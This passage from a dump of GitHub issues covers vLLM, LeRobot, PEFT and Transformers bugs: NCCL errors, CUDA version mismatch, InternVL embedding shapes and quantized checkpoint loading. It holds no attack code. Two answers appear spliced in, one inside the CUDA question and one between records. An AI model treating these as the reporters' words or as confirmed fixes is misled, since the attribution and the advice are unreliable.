--gpu-memory-utilization 0.9 --port 8000 --tool-call-parser openai --enable-auto-tool-choice`\n\nclient = MCPClient.from_dict(config)\nllm = ChatOpenAI(\n model=\"openai/gpt-oss-20b\",\n base_url=\"http://127.0.0.1:8000/v1\", \n api_key=\"not-needed\",\n temperature=0.8,\n max_tokens=2048\n)\nagent = MCPAgent(llm=llm, client=client, max_steps=30)\n\n\nI am also raising this on mcp-use.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26806", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-14T13:00:38Z", "updated_at": "2025-11-20T06:33:29Z", "comments": 2, "user": "Tahirc1" }, { "repo": 
"vllm-project/vllm", "number": 26786, "title": "[Usage]: cuda12.8 docker 0.11.0 Error occurs when launching the model, NCCL error: unhandled cuda error.", "body": "When I use only a single graphics card, the system can start up normally.\nBelow are Docker configuration files, logs, and environment information.\n\nI encountered this issue when upgrading from version 10.1.1 to 10.2.\n\n[The system generates an error when using dual graphics cards; version 10.1.1 functions correctly, but version 10.2 triggers an error upon execution.](https://github.com/vllm-project/vllm/issues/25813)\n\n### Your current environment\n\n```text\n# vllm collect-env \nINFO 10-14 19:07:58 [__init__.py:216] Automatically detected platform cuda.\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.6.87.2-microsoft-standard-WSL2-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA GeForce RTX 4090\nGPU 1: NVIDIA GeForce RTX 4090\n\nNvidia driver version : 571.96\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 40\nOn-line CPU(s) list: 0-39\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 6148 CPU @ 2.40GHz\nCPU family: 6\nModel: 85\nThread(s) per core: 2\nCore(s) per socket: 20\nSocket(s): 1\nStepping: 4\nBogoMIPS: 4788.75\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon rep_good nopl xtopology cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pdcm pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch pti ssbd ibrs ibpb stibp fsgsbase bmi1 hle avx2 smep bmi2 erms invpcid rtm avx512f avx512dq rdseed adx smap clflushopt clwb avx512cd avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves md_clear flush_l1d arch_capabilities\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 640 KiB (20 instances)\nL1i cache: 640 KiB (20 instances)\nL2 cache: 20 MiB (20 instances)\nL3 cache: 27.5 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-39\nVulnerability Gather data sampling: Unknown: Dependent on hypervisor status\nVulnerability Itlb multihit: KVM: Mitigation: VMX unsupported\nVulnerability L1tf: Mitigation; PTE Inversion\nVulnerability Mds: Mitigation; Clear CPU buffers; SMT Host state unknown\nVulnerability Meltdown: Mitigation; PTI\nVulnerability Mmio stale data: Mitigation; Clear CPU buffers; SMT Host state 
unknown\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Mitigation; IBRS\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; IBRS; IBPB conditional; STIBP conditional; RSB filling; PBRSB-eIBRS Not affected; BHI SW loop, KVM SW loop\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Mitigation; Clear CPU buffers; SMT Host state unknown\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.3.1\n[pip3] numpy==", "url": "https://github.com/vllm-project/vllm/issues/26786", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-14T09:01:39Z", "updated_at": "2025-11-07T17:17:32Z", "comments": 3, "user": "ooodwbooo" }, { "repo": "vllm-project/vllm", "number": 26774, "title": "[Usage]: how to use vllm on CUDA 12.9", "body": "### Your current environment\n\n```text\nTraceback (most recent call last):\n File \"/vllm-workspace/collect_env.py\", line 825, in \n main()\n File \"/vllm-workspace/collect_env.py\", line 804, in main\n output = get_pretty_env_info()\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/vllm-workspace/collect_env.py\", line 799, in get_pretty_env_info\n return pretty_str(get_env_info())\n ^^^^^^^^^^^^^^\n File \"/vllm-workspace/collect_env.py\", line 619, in get_env_info\n cuda_module_loading=get_cuda_module_loading_config(),\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/vllm-workspace/collect_env.py\", line 540, in get_cuda_module_loading_config\n torch.cuda.init()\n File \"/usr/local/lib/python3.12/dist-packages/torch/cuda/__init__.py\", line 339, in init\n _lazy_init()\n File \"/usr/local/lib/python3.12/dist-packages/torch/cuda/__init__.py\", line 372, in _lazy_init\n torch._C._cuda_init()\nRuntimeError: No CUDA GPUs are available\nroot@test2222-7dcd6b94b7-wl6w4:/vllm-workspace# python3 --version\nPython 3.12.1\n```\n\n\n### How would you like to use vllm\n\nMy node CUDA version is 12.9, and the running pod image CUDA variable is 12.8. Will this cause the No CUDA GPUs are available error? Is 12.9 compatible with version 12.8? 
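Generally yes: NVIDIA's minor-version compatibility means a node with a CUDA 12.9 driver can run 12.8-built binaries, so before changing versions it is worth a quick in-pod check (a sketch; "No CUDA GPUs are available" is more often caused by the GPU not being exposed to the pod than by a 12.8-vs-12.9 clash):

```python
import torch

print(torch.version.cuda)          # CUDA the wheel was built with, e.g. "12.8"
print(torch.cuda.is_available())   # False here means no visible GPU, not a version clash
print(torch.cuda.device_count())
```

If `is_available()` returns False, checking `nvidia-smi` inside the pod and the Kubernetes GPU resource request / NVIDIA_VISIBLE_DEVICES settings is usually more productive than downgrading the node driver.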
Should we upgrade the VLLM version or lower the CUDA version of the node to 12.8?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26774", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-14T07:30:56Z", "updated_at": "2025-10-14T07:40:08Z", "comments": 1, "user": "Mrpingdan" }, { "repo": "vllm-project/vllm", "number": 26772, "title": "[Feature]: Option kv_event default config", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe current kv_event config has publisher set to null while endpoint defaults to a zmq endpoint, so when the publisher is not configured, vLLM cannot start and raises: `EventPublisher.__init__() got an unexpected keyword argument 'endpoint'`.\n\nCan we change the default publisher to zmq, so that users who enable enable_kv_cache_events can use it directly?\nhttps://github.com/vllm-project/vllm/blob/d32c611f455766c9d67034b5e0f8e66f28f4a3ba/vllm/config/kv_events.py#L20-L24\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26772", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-10-14T07:08:58Z", "updated_at": "2025-10-22T19:19:34Z", "comments": 5, "user": "lengrongfu" }, { "repo": "vllm-project/vllm", "number": 26762, "title": "[Usage]: about curl http://ip:8000/metrics", "body": "### Your current environment\n\nWhen I run this command, I get the following results: \n# HELP python_gc_objects_collected_total Objects collected during gc\n# TYPE python_gc_objects_collected_total counter\npython_gc_objects_collected_total{generation=\"0\"} 12286.0\npython_gc_objects_collected_total{generation=\"1\"} 1244.0\npython_gc_objects_collected_total{generation=\"2\"} 1326.0\n# HELP python_gc_objects_uncollectable_total Uncollectable objects found during GC\n# TYPE python_gc_objects_uncollectable_total counter\npython_gc_objects_uncollectable_total{generation=\"0\"} 0.0\npython_gc_objects_uncollectable_total{generation=\"1\"} 0.0\npython_gc_objects_uncollectable_total{generation=\"2\"} 0.0\n# HELP python_gc_collections_total Number of times this generation was collected\n# TYPE python_gc_collections_total counter\npython_gc_collections_total{generation=\"0\"} 1378.0\npython_gc_collections_total{generation=\"1\"} 124.0\npython_gc_collections_total{generation=\"2\"} 9.0\n# HELP python_info Python platform information\n# TYPE python_info gauge\npython_info{implementation=\"CPython\",major=\"3\",minor=\"12\",patchlevel=\"11\",version=\"3.12.11\"} 1.0\n# HELP process_virtual_memory_bytes Virtual memory size in bytes.\n# TYPE process_virtual_memory_bytes gauge\nprocess_virtual_memory_bytes 1.1701968896e+010\n# HELP process_resident_memory_bytes Resident memory size in bytes.\n# TYPE process_resident_memory_bytes gauge\nprocess_resident_memory_bytes 1.045848064e+09\n# HELP process_start_time_seconds Start time of the process since unix epoch in seconds.\n# TYPE process_start_time_seconds gauge\nprocess_start_time_seconds 1.76036994809e+09\n# HELP 
process_cpu_seconds_total Total user and system CPU time spent in seconds.\n# TYPE process_cpu_seconds_total counter\nprocess_cpu_seconds_total 148.44\n# HELP process_open_fds Number of open file descriptors.\n# TYPE process_open_fds gauge\nprocess_open_fds 69.0\n# HELP process_max_fds Maximum number of open file descriptors.\n# TYPE process_max_fds gauge\nprocess_max_fds 1.048576e+06\n# HELP http_requests_total Total number of requests by method, status and handler.\n# TYPE http_requests_total counter\nhttp_requests_total{handler=\"none\",method=\"GET\",status=\"4xx\"} 1.0\n# HELP http_requests_created Total number of requests by method, status and handler.\n# TYPE http_requests_created gauge\nhttp_requests_created{handler=\"none\",method=\"GET\",status=\"4xx\"} 1.7604160309440813e+09\n# HELP http_request_size_bytes Content length of incoming requests by handler. Only value of header is respected. Otherwise ignored. No percentile calculated. \n# TYPE http_request_size_bytes summary\nhttp_request_size_bytes_count{handler=\"none\"} 1.0\nhttp_request_size_bytes_sum{handler=\"none\"} 0.0\n# HELP http_request_size_bytes_created Content length of incoming requests by handler. Only value of header is respected. Otherwise ignored. No percentile calculated. \n# TYPE http_request_size_bytes_created gauge\nhttp_request_size_bytes_created{handler=\"none\"} 1.7604160309442668e+09\n# HELP http_response_size_bytes Content length of outgoing responses by handler. Only value of header is respected. Otherwise ignored. No percentile calculated. \n# TYPE http_response_size_bytes summary\nhttp_response_size_bytes_count{handler=\"none\"} 1.0\nhttp_response_size_bytes_sum{handler=\"none\"} 22.0\n# HELP http_response_size_bytes_created Content length of outgoing responses by handler. Only value of header is respected. Otherwise ignored. No percentile calculated. \n# TYPE http_response_size_bytes_created gauge\nhttp_response_size_bytes_created{handler=\"none\"} 1.7604160309445088e+09\n# HELP http_request_duration_highr_seconds Latency with many buckets but no API specific labels. Made for more accurate percentile calculations. 
\n# TYPE http_request_duration_highr_seconds histogram\nhttp_request_duration_highr_seconds_bucket{le=\"0.01\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.025\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.05\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.075\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.1\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.25\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"0.75\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"1.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"1.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"2.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"2.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"3.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"3.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"4.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"4.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"5.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"7.5\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"10.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"30.0\"} 1.0\nhttp_request_duration_highr_seconds_bucket{le=\"60.0\"} 1.0\nhttp_request_duration_highr_se", "url": "https://github.com/vllm-project/vllm/issues/26762", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-14T05:13:30Z", "updated_at": "2025-10-14T05:13:30Z", "comments": 0, "user": "Renoshen" }, { "repo": "huggingface/lerobot", "number": 2194, "title": "During training with PI0, the loss is very low. Is this normal, and is the training proceeding correctly?", "body": "I am currently training with PI05.\n\n\"Image\"\n\n`INFO 2025-10-14 04:57:11 ot_train.py:299 step:10 smpl:320 ep:0 epch:0.00 loss:0.468 grdn:3.522 lr:1.6e-07 updt_s:4.906 data_s:4.874 INFO 2025-10-14 04:57:59 ot_train.py:299 step:20 smpl:640 ep:0 epch:0.00 loss:0.467 grdn:3.936 lr:4.1e-07 updt_s:4.807 data_s:0.008 INFO 2025-10-14 04:58:48 ot_train.py:299 step:30 smpl:960 ep:0 epch:0.01 loss:0.508 grdn:3.973 lr:6.6e-07 updt_s:4.815 data_s:0.009 INFO 2025-10-14 04:59:36 ot_train.py:299 step:40 smpl:1K ep:1 epch:0.01 loss:0.513 grdn:3.805 lr:9.1e-07 updt_s:4.841 data_s:0.009`\n\nThe loss is very low right from the start of training. 
Is it training normally?", "url": "https://github.com/huggingface/lerobot/issues/2194", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-10-14T05:04:31Z", "updated_at": "2025-10-14T08:19:29Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/peft", "number": 2832, "title": "Gradient checkpoint with multiple adapters", "body": "I'm not sure if it can be considered a bug, since I might be using the library differently from how it's supposed to be used.\n\n\n**Context:**\n\nI have a PeftModel that needs to be run with 2 different inputs.\nFor each input I have a pretrained adapter that is frozen and a new adapter for finetuning.\n\nMy forward does:\n```\nfor name, x in inputs:\n mypeft_model.base_model.set_adapter([name+'pretrain',name+'ft'])\n custom_set_pretrain_grad_false_ft_true() #Doing it because set_adapter force gradients to True cf 2759#issue-3363985341\n feature = mypeft_model(x)\n```\n (https://github.com/huggingface/peft/issues/2759#issue-3363985341)\n**Issue:**\n1) If mypeft_model contains cp.checkpoint(mymodule, x), backpropagation will not properly update the weights of the LoRA layers in my module, either because it did not 'see' the set_adapter or because it did not 'see' the forced grad.\n2) A workaround I have found is to wrap the whole code inside the loop with a cp.checkpoint, but it is very heavy on memory as I have to keep everything on the GPU until the end of the backbone (a ViT-G transformer with 40 blocks).\n\n**Question:**\nIs there any way to 'provide' the context to the backpropagation even when using gradient checkpointing while switching adapters in the forward?\nI have not explored huggingface transformers.enable_gradient_checkpointing() since I'm using a custom model and I'm unsure whether it fits my problem.\n", "url": "https://github.com/huggingface/peft/issues/2832", "state": "closed", "labels": [], "created_at": "2025-10-14T03:53:10Z", "updated_at": "2025-12-15T08:24:03Z", "comments": 3, "user": "NguyenRichard" }, { "repo": "huggingface/lerobot", "number": 2192, "title": "how to test PI0's output", "body": "I use this code to test PI0's output:\n\ndef main():\n # Create a directory to store the training checkpoint.\n output_directory = Path(\"outputs/example_aloha_static_coffee\")\n output_directory.mkdir(parents=True, exist_ok=True)\n\n # # Select your device\n device = torch.device(\"cuda\")\n\n # Number of offline training steps (we'll only do offline training for this example.)\n # Adjust as you prefer. 5000 steps are needed to get something worth evaluating.\n training_steps = 500\n log_freq = 1\n\n # When starting from scratch (i.e. not from a pretrained policy), we need to specify 2 things before\n # creating the policy:\n # - input/output shapes: to properly size the policy\n # - dataset stats: for normalization and denormalization of input/outputs\n dataset_metadata = LeRobotDatasetMetadata(\"lerobot/aloha_static_coffee\")\n print(dataset_metadata.features.keys())\n features = dataset_to_policy_features(dataset_metadata.features)\n output_features = {key: ft for key, ft in features.items() if ft.type is FeatureType.ACTION}\n input_features = {key: ft for key, ft in features.items() if key not in output_features}\n\n # Policies are initialized with a configuration class, in this case `PI0Config`.
For this example,\n # we'll just use the defaults and so no arguments other than input/output features need to be passed.\n cfg = PI0Config(input_features=input_features, output_features=output_features)\n print(cfg)\n\n # We can now instantiate our policy with this config and the dataset stats.\n policy = PI0Policy(cfg)\n policy.train()\n policy.to(device)\n preprocessor, postprocessor = make_pre_post_processors(cfg, dataset_stats=dataset_metadata.stats)\n\n # We can then instantiate the dataset with these delta_timestamps configuration.\n dataset = LeRobotDataset(\"lerobot/aloha_static_coffee\")\n\n # Take one sample for a quick test\n state = dataset[20][\"observation.state\"]\n image_cam_high = dataset[20][\"observation.images.cam_high\"]\n image_cam_left_wrist = dataset[20][\"observation.images.cam_left_wrist\"]\n image_cam_low = dataset[20][\"observation.images.cam_low\"]\n image_cam_right_wrist = dataset[20][\"observation.images.cam_right_wrist\"]\n effort = dataset[20][\"observation.effort\"]\n state = state.unsqueeze(0).to(device)\n image_cam_high = image_cam_high.unsqueeze(0).to(device)\n image_cam_left_wrist = image_cam_left_wrist.unsqueeze(0).to(device)\n image_cam_low = image_cam_low.unsqueeze(0).to(device)\n image_cam_right_wrist = image_cam_right_wrist.unsqueeze(0).to(device)\n effort = effort.unsqueeze(0).to(device)\n print(\"State size: \", state.size())\n print(\"Image size: \", image_cam_high.size())\n print(\"Effort size: \", effort.size())\n observation = {\n \"observation.state\": state,\n \"observation.images.cam_high\": image_cam_high,\n \"observation.images.cam_left_wrist\": image_cam_left_wrist,\n \"observation.images.cam_low\": image_cam_low,\n \"observation.images.cam_right_wrist\": image_cam_right_wrist,\n \"observation.effort\": effort,\n }\n\n # Output the action\n with torch.inference_mode():\n action = policy.select_action(observation)\n numpy_action = action.squeeze(0).to(\"cpu\").numpy()\n print(\"Action: \", numpy_action)\n\n\nbut got an error:\n\nTraceback (most recent call last):\n File \"/home/wjg/trainpi0.py\", line 140, in \n main()\n File \"/home/wjg/trainpi0.py\", line 129, in main\n action = policy.select_action(observation)\n File \"/data/wjg_files/anaconda3/envs/lerobot/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 1144, in select_action\n actions = self.predict_action_chunk(batch)[:, : self.config.n_action_steps]\n File \"/data/wjg_files/anaconda3/envs/lerobot/lib/python3.10/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 1157, in predict_action_chunk\n lang_tokens, lang_masks = batch[f\"{OBS_LANGUAGE_TOKENS}\"], batch[f\"{OBS_LANGUAGE_ATTENTION_MASK}\"]\nKeyError: 'observation.language.tokens'\n\nHow can I solve it?", "url": "https://github.com/huggingface/lerobot/issues/2192", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-14T03:36:43Z", "updated_at": "2025-10-17T09:56:46Z", "user": "Addog666" }, { "repo": "vllm-project/vllm", "number": 26749, "title": "[Bug]: InternVL: passing image embeddings triggers TypeError: can only concatenate tuple (not \"Tensor\") to tuple in get_multimodal_embeddings, and v1 sanity check then expects a sequence of 2D tensors", "body": "### Your current environment\n\n
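Before the next report: on the lerobot KeyError above ('observation.language.tokens'), a hedged sketch of one likely fix. The script builds `preprocessor` via make_pre_post_processors but never applies it, and in recent lerobot it is that pipeline which tokenizes a task string into the observation.language.* keys the PI0 policy reads. The "task" key and instruction string are assumptions based on lerobot dataset conventions, not a verified fix.

```python
# Hypothetical fix sketch, reusing the names from the script above.
observation["task"] = "pick up the coffee capsule"  # illustrative instruction

# The preprocessor pipeline (built earlier but unused) should add, among
# other keys, observation.language.tokens and the language attention mask.
observation = preprocessor(observation)

with torch.inference_mode():
    action = policy.select_action(observation)
```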
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\n# Title\nInternVL: passing image **embeddings** triggers `TypeError: can only concatenate tuple (not \"Tensor\") to tuple` in `get_multimodal_embeddings`, and v1 sanity check then expects a sequence of 2D tensors\n\n## Environment\n- vLLM: 0.10.2 (also reproducible on 0.10.1)\n- Python: 3.11.x\n- Model: `InternVL3_5-1B` (HF, `trust_remote_code=True`)\n\n## Minimal Repro (image **embeddings** input)\n```python\nfrom vllm import LLM\nimport torch\n\nllm = LLM(model=\"InternVL3_5-1B\", trust_remote_code=True)\n\nprompt = \"USER: \\nWhat is this image?\\nASSISTANT:\"\n\n# 3D embeddings: [B, T, H] just to illustrate the bug (B=1 here)\n# H equals the LM hidden_size for the given weight; using 1024 to reproduce.\nimage_embeds = torch.randn(1, 16, 1024)\n\nout = llm.generate({\n \"prompt\": prompt,\n \"multi_modal_data\": {\"image\": image_embeds}, # or {\"images\": image_embeds}\n})\nprint(out[0].outputs[0].text)\n```\n\n## Actual Behavior / Stack\nOn 0.10.2:\n\n```\nFile \".../vllm/model_executor/models/internvl.py\", line 1328, in get_multimodal_embeddings\n multimodal_embeddings += vision_embeddings\nTypeError: can only concatenate tuple (not \"Tensor\") to tuple\n```\n\nIf we monkey-patch around the above concat, the engine soon asserts:\n\n```\nvllm/v1/worker/utils.py\", line 155, in sanity_check_mm_encoder_outputs\nAssertionError: Expected multimodal embeddings to be a sequence of 2D tensors,\nbut got tensors with shapes [torch.Size([1, 16, 1024])] instead.\nThis is most likely due to incorrect implementation of the model's `get_multimodal_embeddings` method.\n```\n\nSo there are **two inconsistencies**:\n1) `get_multimodal_embeddings` sometimes returns a **Tensor** (3D) but the code path later concatenates assuming a **tuple** of tensors. \n2) v1 expects a **sequence of 2D tensors `[T, H]`**, but the current image-embeddings path can yield a **3D** `[B, T, H]` tensor (batch dimension not flattened), which fails the sanity check.\n\n## Expected Behavior\n- Passing embeddings should **not crash**, whether provided as:\n - a single 2D tensor `[T, H]` (one image), or\n - a 3D tensor `[B, T, H]` (batch of images), or\n - a list/tuple of 2D tensors. \n- `get_multimodal_embeddings` should normalize its outputs to a **sequence of 2D tensors** to satisfy `sanity_check_mm_encoder_outputs`.\n\n## Why this matters\nInternVL supports both pixel inputs and precomputed **embeddings**. The embedding path is useful in production pipelines (pre-encode vision on different hardware, caching, etc.). Currently in 0.10.1/0.10.2 this path is broken due to type/shape inconsistencies, blocking these use-cases.\n\n## Proposed Fix (minimal)\nNormalize to a sequence of 2D tensors before concatenation. 
For example, in `vllm/model_executor/models/internvl.py` inside `get_multimodal_embeddings(...)`:\n\n```diff\n@@\n- vision_embeddings = self._process_image_input(image_input)\n- if torch.is_tensor(vision_embeddings):\n- vision_embeddings = (vision_embeddings,)\n- multimodal_embeddings += vision_embeddings\n+ vision_embeddings = self._process_image_input(image_input)\n+\n+ # Normalize to tuple[Tensor[T,H], ...]\n+ def _to_2d_seq(x):\n+ import torch\n+ if torch.is_tensor(x):\n+ if x.ndim == 3: # [B, T, H] -> B * [T,H]\n+ return tuple(x.unbind(0))\n+ elif x.ndim == 2: # [T, H]\n+ return (x,)\n+ raise TypeError(f\"vision embeddings must be 2D/3D, got shape {tuple(x.shape)}\")\n+ elif isinstance(x, (list, tuple)):\n+ out = []\n+ for e in x:\n+ out.extend(_to_2d_seq(e))\n+ return tuple(out)\n+ else:\n+ raise TypeError(f\"unexpected type for vision embeddings: {type(x)}\")\n+\n+ vision_embeddings = _to_2d_seq(vision_embeddings)\n+ multimodal_embeddings += vision_embeddings\n```\n\nAdditionally, consider accepting both `\"image\"` and `\"images\"` as modality keys (a few code paths assume `\"images\"`), or clarify in docs which key is canonical.\n\n## Workarounds we tried\n- Wrapping the returned tensor into a tuple (avoids the first `TypeError`), but the v1 sanity check still fails because the output remains 3D.\n- Providing embeddings as a list of 2D tensors `[T, H]` works, but many upstream encoders naturally produce `[B, T, H]`, so normalizing in the model executor is safer.\n- Pixel input path works and can be used as a temporary fallback, but defeats the purpose of passing precomputed embeddings.\n\n## Version Matrix\n- \u2705 Pixel input: OK on 0.10.1 and 0.10.2 \n- \u274c Embedding input: crashe", "url": "https://github.com/vllm-project/vllm/issues/26749", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-14T03:01:33Z", "updated_at": "2025-10-14T09:36:22Z", "comments": 1, "user": "BlueBlueFF" }, { "repo": "huggingface/transformers", "number": 41554, "title": "model.from_pretrained( . . . ) not loading needed weights/parameters", "body": "I am performing quantization of a PatchTSTForPrediction model and attempting to load a saved quantized model for testing. Model is saved using `model.save_pretrained( . . . )`. Testing proceeds perfectly once performed immediately after QAT (Hugging face trainer's handles loading at the end of training); however, when attempting to load a saved quantized (trained) model, the error below occurs. I perform all the pre-quantization preparation so that the model contains all the necessary parameters (untrained) and then try to load the saved checkpoint. How can I force `from_pretrained( . . . )` to load ALL required weights? \n\n`Some weights of the model checkpoint at ./checkpoints/ . . . 
were not used when initializing PatchTSTForPrediction: ['head.projection.calib_counter', 'head.projection.num_module_called', 'head.projection.obsrv_clipval', 'head.projection.obsrv_clipvaln', 'head.projection.obsrv_w_clipval', 'head.projection.quantize_feature.clip_val', 'head.projection.quantize_feature.clip_valn', 'head.projection.quantize_weight.clip_val', 'model.encoder.layers.0.ff.0.calib_counter', 'model.encoder.layers.0.ff.0.num_module_called', 'model.encoder.layers.0.ff.0.obsrv_clipval', 'model.encoder.layers.0.ff.0.obsrv_clipvaln', 'model.encoder.layers.0.ff.0.obsrv_w_clipval', 'model.encoder.layers.0.ff.0.quantize_feature.clip_val', 'model.encoder.layers.0.ff.0.quantize_feature.clip_valn', 'model.encoder.layers.0.ff.0.quantize_weight.clip_val', 'model.encoder.layers.0.ff.3.calib_counter', 'model.encoder.layers.0.ff.3.num_module_called', 'model.encoder.layers.0.ff.3.obsrv_clipval', 'model.encoder.layers.0.ff.3.obsrv_clipvaln', 'model.encoder.layers.0.ff.3.obsrv_w_clipval', 'model.encoder.layers.0.ff.3.quantize_feature.clip_val', 'model.encoder.layers.0.ff.3.quantize_feature.clip_valn', 'model.encoder.layers.0.ff.3.quantize_weight.clip_val', 'model.encoder.layers.0.self_attn.QBmm52.num_module_called', 'model.encoder.layers.0.self_attn.QBmm52.quantize_m1.clip_val', 'model.encoder.layers.0.self_attn.QBmm52.quantize_m1.clip_valn', 'model.encoder.layers.0.self_attn.QBmm52.quantize_m2.clip_val', 'model.encoder.layers.0.self_attn.QBmm52.quantize_m2.clip_valn', 'model.encoder.layers.0.self_attn.QBmm62.num_module_called', 'model.encoder.layers.0.self_attn.QBmm62.quantize_m1.clip_val', 'model.encoder.layers.0.self_attn.QBmm62.quantize_m1.clip_valn', 'model.encoder.layers.0.self_attn.QBmm62.quantize_m2.clip_val', 'model.encoder.layers.0.self_attn.QBmm62.quantize_m2.clip_valn', 'model.encoder.layers.0.self_attn.k_proj.calib_counter', 'model.encoder.layers.0.self_attn.k_proj.num_module_called', 'model.encoder.layers.0.self_attn.k_proj.obsrv_clipval', 'model.encoder.layers.0.self_attn.k_proj.obsrv_clipvaln', 'model.encoder.layers.0.self_attn.k_proj.obsrv_w_clipval', 'model.encoder.layers.0.self_attn.k_proj.quantize_feature.clip_val', 'model.encoder.layers.0.self_attn.k_proj.quantize_feature.clip_valn', 'model.encoder.layers.0.self_attn.k_proj.quantize_weight.clip_val', 'model.encoder.layers.0.self_attn.out_proj.calib_counter', . . .]\n\nThis IS expected if you are initializing PatchTSTForPrediction from the checkpoint of a model trained on another task or with another architecture (e.g. initializing a BertForSequenceClassification model from a BertForPreTraining model).\nThis IS NOT expected if you are initializing PatchTSTForPrediction from the checkpoint of a model that you expect to be exactly identical (initializing a BertForSequenceClassification model from a BertForSequenceClassification model).` \n\nNB: QAT is simulated. Additional parameters are added to the model after qmodel_prep is called and QAT proceeds as normal. I am using IBM's fms-model-optimizer. 
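One hedged workaround sketch for the question above (`build_model` and the `qmodel_prep` call stand in for the reporter's own fms-model-optimizer preparation code, as described in the report): rebuild the quantized module structure first, then load the checkpoint's state dict directly instead of relying on from_pretrained's key filtering, which silently drops keys that have no matching parameter on a freshly constructed model.

```python
from safetensors.torch import load_file

# Re-create the same quantized structure used during QAT so every
# checkpoint key has a matching parameter/buffer on the model.
model = build_model()   # hypothetical: PatchTSTForPrediction from config
qmodel_prep(model)      # hypothetical: same fms-model-optimizer prep as in training

# Load the full checkpoint state dict directly.
state_dict = load_file("./checkpoints/model.safetensors")
missing, unexpected = model.load_state_dict(state_dict, strict=False)
print("missing:", missing)        # should now be empty
print("unexpected:", unexpected)
```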
